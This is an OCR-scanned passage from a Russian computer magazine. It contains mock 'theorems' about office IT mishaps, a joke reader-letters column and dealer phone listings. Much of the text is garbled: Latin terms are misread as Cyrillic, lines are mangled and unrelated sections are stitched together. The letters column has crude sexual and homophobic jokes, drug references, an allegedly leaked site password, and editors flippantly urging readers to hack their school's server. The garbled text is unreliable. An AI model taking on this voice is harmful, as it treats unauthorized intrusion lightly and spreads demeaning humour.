новки ОС. 

10.1.3. Бэкап базы более не помещается на 
сервер в результате уменьшения объема диско- 
вого пространства. 

10.1.4. Сервером стихийно становится вновь 
приобретенная машина, совершенно не приспо- 
собленная для выполнения таких функций, так 
как все ресурсы заняты важными исследова- 
тельскими проектами НІ_-2, 03, НММ-3 и т.д. 

Дополнения: 

10.2.1 . Сказевый стример за 5000 у.е. не 
работает вместе с рейдом. 

10.2.2. Новый скази- контроллер не будет за- 
куплен в любом случае. Вместо него будет за- 
куплен новый сервер, устареющий на момент 
ввода в эксплуатацию и также не работающий со 
стримером. 

10.2.3. Файловые серверы и серверы баз дан- 
ных не существуют. Вместо них используются сер- 
веры приложений с 30-гигабайтными дисками. 

10.2.4. Архив критически важной информа- 
ции хранится на дискетах. 

10.2.5. Стример поставляется с одним нако- 
пителем на 200 Гб. Дополнительные накопители 
не поставляются. Для увеличения дискового 
пространства стримеров ставится дополнитель- 
ный стример. 



©. Теорема о программном обеспечении. 

ПО для выполнения важной работы отдела 
поставляется дружественными организациями. 

Следствия: 

11.1. Поддержка ПО прекращается вместе с 
увольнением сотрудника, его разрабатывавшего. 

1 1 .2. Документации к такому ПО не сущест- 
вует даже в проекте. 

1 1 .3. Для модификации/устранения ошибок в 
ПО используется ЗоЙІсе. 

©. Парадокс программиста. 

Необходимость в том или ином проекте отпа- 
дает за 1 день до сдачи проекта. 

Вне зависимости от сроков реализации. 

Следствие: 

12.1. Если срок установлен равным одному 
дню, то постановщик задачи просто не в курсе 
того, что необходимость уже отпала. 

Дополнение: 

12.2. Заинтересованность заказчика нейтрали- 
зуется просьбой протестировать готовый проект. 

Лемма об отрицании Парадокса программиста: 

12.3.1. Перед выполнением работ начальник 
потребует обстоятельного описания и разъясне- 
ния их причин, содержимого, следствий. 

12.3.2. Работы будут разрешены к выполне- 
нию и доведены до конца. 

1 2.3.3. Время на проведение работ и стаби- 
лизацию последствий их проведения много 
меньше времени выполнения пункта 1 данной 
леммы. 

1 2.3.4. Проверка результатов выполнения ра- 
бот сопряжена с повторением выполнения пунк- 
та 1 от 10 до 20 раз. 

©. Теорема о моде. 

Из п.1 .3. вытекает лейтмотив закупок ноутбуков. 

Покупка ноутбука может быть обусловлена 
тем, что: 

- Он может работать без электричества (И БД 
может производиться в полной темноте и в ус- 
ловиях ядерной войны). 

- Он может быть убран в сейф (для большей 
надежности). 

- Другой отдел уже закупил ноутбуки - вот же 
они, на складе никому не нужные лежат! 

- Я крутой, у меня ноутбук (пусть и на работе)! 

Если отдел технической поддержки снабжен 

здравомыслящими людьми, не любящими шу- 
тить над другими сотрудниками, покупка ноутбу- 
ков не произойдет. 

В противном случае здравомыслящий чело- 
век снабдит ноутбуки мышками. В оставшихся 
случаях начальники заберут все ноутбуки себе и 
поделят их поровну. 

©. Теорема о затычке к каждой бочке. 

Начальнику нужно подведение сетей всех ра- 
бочих групп, поэтому количество компьютеров 
на его рабочем месте равно количеству рабочих 
групп. Если это ноутбуки, то они не пронумеро- 
ваны, мышки отключены за неимением места 
для их передвижения. Под" .чение компьюте- 
ров осуществляется согласно теореме о пра- 
вильном питании. 

б). Постулат Компака. 

Часть БИОС, отвечающая за работу рейд- 
массива, находится на первом скрытом разделе 
рейд-массива, а не в самом БИОС. Формат раз- 
дела не опознается программами типа 
РаіІШопМадіс. 

Следствия: 

15.1.1. Программы переразбиения диска 
опознают скрытый раздел как ошибочный. 



15.1.2. Сбой рейда происходит синхронно с 
отключением организации от интернета. 

Дополнения: 

1 5.2. 1 . Никто не пробует искать драйвера для 
Компака на сайте Компака. 

15.2.2. Компак не поддается апгрейду. 

Наглядный пример Постулата Компака: 

Шр://Ііаге.ги/?ісІ=8. 

©. Замечание об усреднении потреб- 
ностей. 

Современный офисный компьютер, по мне- 
нию молодого администратора, должен быть: 

18" ІЩ 3,2042 Р-4, 1024 МЬ ВАМ, 20006 
ГЮР, 0\Ю- ПѴѴ, 256МЬ Вабеоп Х800ХГ + много 
флешек и прочих крутых гаджетов. 

Современный офисный компьютер, по мне- 
нию начальников, должен быть: 

ноутбук с Р-4. 

Современный офисный компьютер, вводи- 
мый в эксплуатацию, имеет конфигурацию: 

15" ІСО, 20Н і Р-4С, 128 МЬ ВАМ, 40СЬ ТО, 
Сй-Вот, 128МЬ СР4МХ440... 

©. Теоремы о рабочем месте. 

- Программисту лучше всего работается в од- 
ной комнате с секретарем отдела. 

- Секретарю лучше всего работается в комна- 
те, используемой как склад оборудования, сня- 
того с использования в начале 80-х годов. 

- Оборудованию, снятому с использования в 
начале 80-х годов, лучше всего живется, если 
оно в беспорядке расставлено посреди комнаты. 

- Оборудование из Теоремы 3 не разрешено 
разбирать, а в собранном состоянии каждый 
шкаф весит не менее 1 28 кг. 

Следствия: 

17.1 .1 . Программист любит, когда посетители 
секретаря смотрят через плечо ему на монитор. 

17.1.2. Программист любит рассказывать 
каждому, кто скучает в комнате, ожидая своей 
очереди пообщаться с секретарем, какую прог- 
рамму он пишет, на каком языке и почему имен- 
но на этом, этой версии и этой фирмы. 

Дополнение: 

17.2. Где бы программист ни работал, его ра- 
бочий день за непосредственным написанием 
программ не составляет более 1 часа. Все ос- 
тальное время он выполняет работу находящих- 
ся с ним в одной комнате людей. 

Следствие: 

17.3. Если программист не занят выполнени- 
ем обязанностей находящихся с ним в комнате, 
он занят тем, что объясняет по телефону, поче- 
му секретаря нет на месте, где его можно найти, 
а также выполняет функцию интеллектуального 
автоответчика с базой звонков, звонивших, при- 
чин и прочего. 
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Ч: Вы .питии не отвечаете па шни читатепяи, рубрика трепа - 6пеф?_ 
К Бпеф, разунее тоя. Д рубрика «Кодинг» - вообще басн^ 

Ч! Прочитайте слово «потенция» наоборот!!! (если не 
поняли - яиц нет, оп! :)))) 

Не поняли... При чем тут отсутствие яиц-то? :( 

Ч! По данным международной организации сексуальных 
меньшинств, большинство голубых прокручивают СМС 
большим пальцем. Не прячь пальчик, ты попался, мальчик! 

По данным международной организации капрофилов, 
большинство капрофилов жмут по клавиатуре пальцами рук. 
Вот тебе теперь точно не отвертеться, мальчик, твоя жизнь 
как средний пальчик! 

Ч! Привет, Бублик! Я космонавт, тебе сколько лет? Мне 16. 
К! Привет, Гагарин! Я альпинист, у тебя есть девушка? У 
меня была! 

Ч! Привет, я заказывал диск, там написано, через 5 недель 
придет диск «Как стать хакером». 



Ч! Хакер! Твои глаза, как шишки геморроя - 
и днем и ночью не дают покоя!!! 

К! Читатель! Твой рот, как чумка у собаки - при виде рта 
встают у меня дыбом даже баки! 

Ч: с1д]2!и/д951 - ПАРОЛЬ ОТ АПОРТА! 

К! Спасибо. Апорт. 

Ч! Я из-за вашего журнала в поезде Брест-Новосибирск 
сортир взломал! Респект! 

К! Ты что, в унитазе переполнение буфера сделал? :) 

Ч! Маленький мальчик читал Камасутру. Шестую позицию 
принял под утро. Помни, товарищ: секс - не игрушки! Маль- 
чик погиб, он застрял в раскладушке. 

К! Саша Лозовский попробовал тоже. Читал Камасутру, уст- 
роившись в ложе. Помнил он четко, что секс - не игрушки! 
Теперь вот все липко у него под подушкой! 



Ч: Д правда, чтд Симбиоз ушеп туда же, куда и Даня? 



К: Нет, с тех пор как ушеп Данн, иы натон не посыпаем никого и никуда :). 



К! Классно, а мой пес недавно стал чемпионом России! 

Ч! Как избавиться от троянов на 5000, 1025 и 135 портах? 
Что они делают? 

і! Они висят на 5000, 1025 и 135 портах - вот что они дела- 
ют! Повесь их на другие порты - они запутаются и сгинут! 

Ч! Здорова! А вы про Хакер слышали? Такой журнал есть. 

К! Привет! Слышали! Говорят, что классный журнал. Сами 
еще не читали, к сожалению. 



Ч! Я вчера прогу под ганжубасом написал. Теперь пытаюсь 
понять, для чего. Хелп ми! 

К! Хелп ю? Конечно хелп! Мы всегда рады хелпнуть ганжу- 
баса немного! Или ты не об этом? 

Ч! Сколько стоит заказать Билла Гейтса? 

К! Пицот! 

Ч! А чего от вас так луком пахнет? И почему Куттер не ука- 
зал свой телефон? 
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Сверку Ь 1 пі, а и попе - пинт! С приветом к ван - ешр7ув0п7а 1 пеЯ 



Сверку знп еевенвайкон севен эй уан нер, а в папе - винт! С детства Лушкина люблю. 



Ч! Я есть требовать второй двд в подарок, а 
то ваш сервак похакаю! 

Мы пить не мочь подарить тебе второй двд, а то все за- 
хотеть тоже и похакать наш сервак чаще! 

Ч! Дождешься от вас секса... =( 

К! В очередь, сукины дети, в очередь! (с) 

Я еду в танке, все путем! 

К! Я дунул гашик. Все пучком. 

Ч! Почему в вашем журнале опускают ламеров? Может, 
сделаете журнал «Ламер» и будете опускать хакеров? 

! А может, сделать тюрьмы, в которых пИтухи опускают па- 
ханов? 

Ч! Меня девочки не любят, что мне делать? Кажись, я бота- 
ник :(. 

К! Мож, мальчики любят хотя бы? Тогда не обязательно ты 
и ботаник. 

Привет, хацкеры! Говорят, что вы герои, - это правда? 

К! Да гадами будем, если вранье! 

Мы с другом идем в новую школу. Хотим похакать их 
сервак. Не посоветуете? 

X! Советуем вам похакать их сервак. 

Ч! Предлагаю кроме номеров печатать в журнале ваш адрес 
и каждую пятницу у кого-нибудь на хате устраивать вечери- 
ну. Читателям будет интересно пощупать всех редакторов 
вживую. 

X! Ну конечно, а потом попросите опубликовать номера сче- 
тов в банках, чтобы читатели могли ощутить зарплату всех 
редакторов? :) 



X! Да это ты просто у себя под носом помазал луком - вот 
тебе и кажется, что от нас воняет. 

Ч: .огд - это зона оргий, что ли? 

! Ну да. Ты прав. А .сот - это зона коматоза. 

Ч! Жизни нет, не стоит, хочу ХУМОР! 

X! Какой уж Хумор и жизнь, когда не стоит? 

Ч! Всем хай! Я взломал Майкрософт, что делать дальше? 
Хі Сушить сухари 
и учить феню - в 
скором времени 
пригодится. 

Ч! Почему хоро- 
ших людей рань- 
ше было боль- 
ше? Плохой че- 
ловек. 

X! Потому что 
хорошие люди 
до свадьбы ни- 
ни, а плохим по 
фигу, и они пло- 
дятся быстрее. 



Зпѵшоі 
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ПортКом (095)777-0210; Архангельск: Северная Корона (8182) 653-525; Волгоград: Техком (8612) 699-850; Воронеж: Рет (0732) 779-339; РИАН (0732) 512-412; Сани (0732) 54-00-00 
Иркутск: Билайн (3952) 240-024; Комтек (3952) 258-338; Краснодар: Игрек (8612) 699-850; Лабытнанги: КЦ ЯМАЛ (34992) 51777; Липецк: Регард-тур (0742) 485-285 
Новосибирск: Квеста (38322) 332-407; Нижний Новгород: Бюро-К (8312) 422-367; Пермь: Гаском (8612) 699-850; Ростов-на-Дону: Зенит-Компьютер (8632) 950-300 
Тюмень: ИНЭКС-Техника (3452) 390-036. 
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